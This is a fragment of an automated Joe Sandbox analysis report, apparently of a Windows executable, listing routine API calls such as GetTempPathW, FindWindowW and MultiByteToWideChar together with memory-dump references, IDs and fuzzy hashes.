                                                                                                                                                                                                                                                                                                        • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 010239F0
                                                                                                                                                                                                                                                                                                        • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 01023A05
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Temp$FileNamePath
                                                                                                                                                                                                                                                                                                        • String ID: aut
                                                                                                                                                                                                                                                                                                        • API String ID: 3285503233-3010740371
                                                                                                                                                                                                                                                                                                        • Opcode ID: 16ebad75a0084e8c9a1138d337ab1142965bee5a0bb1eae0aeac6d0bbe64fd0c
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9687b0118d1e9d9122581ea35b1feb8722575cf41abbc475a06aa4883689a670
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16ebad75a0084e8c9a1138d337ab1142965bee5a0bb1eae0aeac6d0bbe64fd0c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1BD05EB690032877DA30A6A59E4EFCB7B6CDB54660F0002A1BA9596085DAB4DA85CB90
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 01042DC8
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 01042DDB
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101F292: Sleep.KERNEL32 ref: 0101F30A
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                                        • Opcode ID: 57dfa24232858f3a668639ed39145f9b000aaf84bac0cc573140f11151714bf7
                                                                                                                                                                                                                                                                                                        • Instruction ID: 51d91beaa547366d6caa1c40c4a4a5849dd4dd665e5b6c8d48dd6e06d029ab51
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 57dfa24232858f3a668639ed39145f9b000aaf84bac0cc573140f11151714bf7
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 02D02279380311B7E234B3B0AD4FFD27B10AF20B00F100824B3C9AA0C8C8E86800C784
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 01042E08
                                                                                                                                                                                                                                                                                                        • PostMessageW.USER32(00000000), ref: 01042E0F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101F292: Sleep.KERNEL32 ref: 0101F30A
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                                        • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00FEC213
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00FEC221
                                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00FEC27C
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1717984340-0